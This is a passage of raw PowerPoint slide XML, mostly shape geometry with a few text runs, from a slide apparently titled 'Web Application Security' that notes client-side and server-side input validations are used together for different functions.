                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="195708" y="1465680"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="149697" y="1451397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108061" y="1428798"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71786" y="1398868"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41857" y="1362592"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19260" y="1320957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4979" y="1274947"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1225550"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="245110"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="19050">
              <a:solidFill>
                <a:srgbClr val="57AEF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049523" y="6675119"/>
              <a:ext cx="1531620" cy="449580"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1531620" h="449579">
                  <a:moveTo>
                    <a:pt x="1456689" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="74930" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="45755" y="5885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21939" y="21939"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5885" y="45755"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="74929"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="374649"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5885" y="403824"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21939" y="427640"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="45755" y="443694"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74930" y="449579"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1456689" y="449579"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1485864" y="443694"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1509680" y="427640"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1525734" y="403824"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1531620" y="374649"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1531620" y="74929"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1525734" y="45755"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1509680" y="21939"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1485864" y="5885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1456689" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="44AAF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3483355" y="6705345"/>
            <a:ext cx="61277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40" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Note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088639" y="7580503"/>
            <a:ext cx="1068768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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Both</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="20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90">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>client-side</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="20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5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0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75">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>server-side</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-14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0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>input</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="20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0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>validations</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-13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dirty="0" sz="20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0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>used</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="20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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>together</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="20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5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dirty="0" sz="20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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>different</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="20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0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>functions.</a:t>
            </a:r>
            <a:endParaRPr sz="2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97371" y="306451"/>
            <a:ext cx="44608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70">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Web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55">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Application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40">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Security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2247" y="760476"/>
            <a:ext cx="6192011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555746" y="3102355"/>
            <a:ext cx="2433955" cy="4551680"/>
            <a:chOff x="3555746" y="3102355"/>
            <a:chExt cx="2433955" cy="4551680"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="object 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3555746" y="3102355"/>
              <a:ext cx="2290445" cy="4551680"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2290445" h="4551680">
                  <a:moveTo>
                    <a:pt x="72136" y="4408932"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="44529" y="4415256"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22256" y="4431141"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7556" y="4454241"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2666" y="4482211"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8991" y="4509817"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24876" y="4532090"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47976" y="4546790"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75945" y="4551680"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103552" y="4545355"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125825" y="4529470"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140525" y="4506370"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142595" y="4494530"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74421" y="4494530"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="73659" y="4466082"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142185" y="4464305"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139090" y="4450794"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123205" y="4428521"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100105" y="4413821"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="72136" y="4408932"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2290445" h="4551680">
                  <a:moveTo>
                    <a:pt x="142185" y="4464305"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="73659" y="4466082"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74421" y="4494530"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142902" y="4492776"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="145414" y="4478401"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142185" y="4464305"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2290445" h="4551680">
                  <a:moveTo>
                    <a:pt x="142902" y="4492776"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="74421" y="4494530"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142595" y="4494530"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142902" y="4492776"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2290445" h="4551680">
                  <a:moveTo>
                    <a:pt x="140239" y="58837"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="142748" y="73152"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139502" y="87362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="184403" y="88519"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="295655" y="96901"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="405256" y="110998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="513206" y="130175"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="619125" y="154686"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="723138" y="184277"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="824864" y="218694"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="924178" y="257937"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1021206" y="301752"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1115694" y="350139"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1207389" y="402971"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1296162" y="459867"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1382140" y="520954"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1464817" y="585978"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1544319" y="654812"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1620392" y="727456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1692909" y="803529"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1761616" y="882904"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1826640" y="965708"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1887727" y="1051560"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1944751" y="1140460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1997455" y="1232154"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2045715" y="1326642"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2089530" y="1423670"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2128774" y="1523111"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2163191" y="1624965"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2192654" y="1728851"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2217166" y="1834769"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2236342" y="1942592"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2250313" y="2052320"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2258694" y="2163445"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2261616" y="2276221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2258694" y="2388870"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2250313" y="2499995"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2236342" y="2609469"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2217039" y="2717292"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2192654" y="2823210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2163191" y="2926969"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2128774" y="3028696"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2089530" y="3128010"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2045715" y="3225038"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1997455" y="3319399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1944877" y="3411093"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1887981" y="3499866"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1826894" y="3585718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1761998" y="3668395"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1693290" y="3747770"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1620774" y="3823843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1544827" y="3896360"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1465452" y="3965321"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1382776" y="4030218"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1297051" y="4091305"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1208277" y="4148201"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1116711" y="4201033"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1022350" y="4249420"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="925449" y="4293235"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="826007" y="4332478"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="724407" y="4367022"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="620521" y="4396613"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="514730" y="4421124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="407034" y="4440555"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="297433" y="4454525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="186308" y="4463161"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142185" y="4464305"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="145414" y="4478401"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142902" y="4492776"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="188467" y="4491609"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="300989" y="4482846"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="411988" y="4468622"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="521080" y="4448937"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="628395" y="4424172"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="733551" y="4394073"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="836549" y="4359148"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="937132" y="4319270"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1035303" y="4274820"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1130934" y="4225798"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1223771" y="4172331"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1313561" y="4114546"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1400428" y="4052697"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1484121" y="3986784"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1564513" y="3917061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1641475" y="3843655"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1714880" y="3766566"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1784477" y="3686048"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1850136" y="3602228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1911984" y="3515360"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1969642" y="3425317"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2022855" y="3332353"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2071751" y="3236849"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2116201" y="3138551"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2155825" y="3037840"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2190623" y="2934843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2220467" y="2829560"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2245232" y="2722245"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2264664" y="2613152"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2278761" y="2502154"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2287269" y="2389505"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2290064" y="2275459"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2287269" y="2161286"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2278633" y="2048637"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2264409" y="1937639"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2244979" y="1828419"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2220087" y="1720977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2190368" y="1615694"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2155443" y="1512570"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2115566" y="1411859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2071242" y="1313561"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2022220" y="1217930"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1968753" y="1125093"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1911095" y="1035050"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1849119" y="948055"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1783206" y="864235"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1713483" y="783844"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1640077" y="706755"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1562989" y="633222"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1482470" y="563499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1398651" y="497713"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1311655" y="435864"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1221613" y="378206"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1128649" y="324739"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1033017" y="275717"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="934719" y="231394"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="833881" y="191516"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="730884" y="156845"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="625475" y="126873"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="518159" y="102108"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="408939" y="82677"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="297814" y="68453"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="185165" y="59944"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140239" y="58837"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2290445" h="4551680">
                  <a:moveTo>
                    <a:pt x="73151" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="45237" y="4891"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22145" y="19605"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6268" y="41915"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="69596"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4891" y="97492"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19605" y="120554"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41915" y="136425"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="69595" y="142748"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97492" y="137856"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="120554" y="123142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="136425" y="100832"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139502" y="87362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70992" y="85598"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71754" y="57150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139943" y="57150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="137856" y="45237"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123142" y="22145"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100832" y="6268"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="73151" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2290445" h="4551680">
                  <a:moveTo>
                    <a:pt x="71754" y="57150"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="70992" y="85598"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139502" y="87362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142748" y="73152"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140239" y="58837"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71754" y="57150"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2290445" h="4551680">
                  <a:moveTo>
                    <a:pt x="139943" y="57150"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="71754" y="57150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140239" y="58837"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139943" y="5715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620006" y="3364229"/>
              <a:ext cx="457200" cy="459105"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="457200" h="459104">
                  <a:moveTo>
                    <a:pt x="228600" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="182533" y="4662"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139624" y="18032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100793" y="39185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66960" y="67198"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39045" y="101147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17966" y="140106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4644" y="183153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="229362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4644" y="275570"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17966" y="318617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39045" y="357576"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66960" y="391525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100793" y="419538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139624" y="440691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="182533" y="454061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228600" y="458724"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="274666" y="454061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317575" y="440691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="356406" y="419538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="390239" y="391525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="418154" y="357576"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="439233" y="318617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="452555" y="275570"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="457200" y="229362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="452555" y="183153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="439233" y="140106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="418154" y="101147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="390239" y="67198"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="356406" y="39185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317575" y="18032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="274666" y="466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75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620006" y="3364229"/>
              <a:ext cx="457200" cy="459105"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="457200" h="459104">
                  <a:moveTo>
                    <a:pt x="0" y="229362"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4644" y="183153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17966" y="140106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39045" y="101147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66960" y="67198"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100793" y="39185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139624" y="18032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="182533" y="4662"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228600" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="274666" y="4662"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317575" y="18032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="356406" y="39185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="390239" y="67198"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="418154" y="101147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="439233" y="140106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="452555" y="183153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="457200" y="229362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="452555" y="275570"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="439233" y="318617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="418154" y="357576"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="390239" y="391525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="356406" y="419538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317575" y="440691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="274666" y="454061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228600" y="458724"/>
                  </a:lnTo>
                  <a:lnTo>
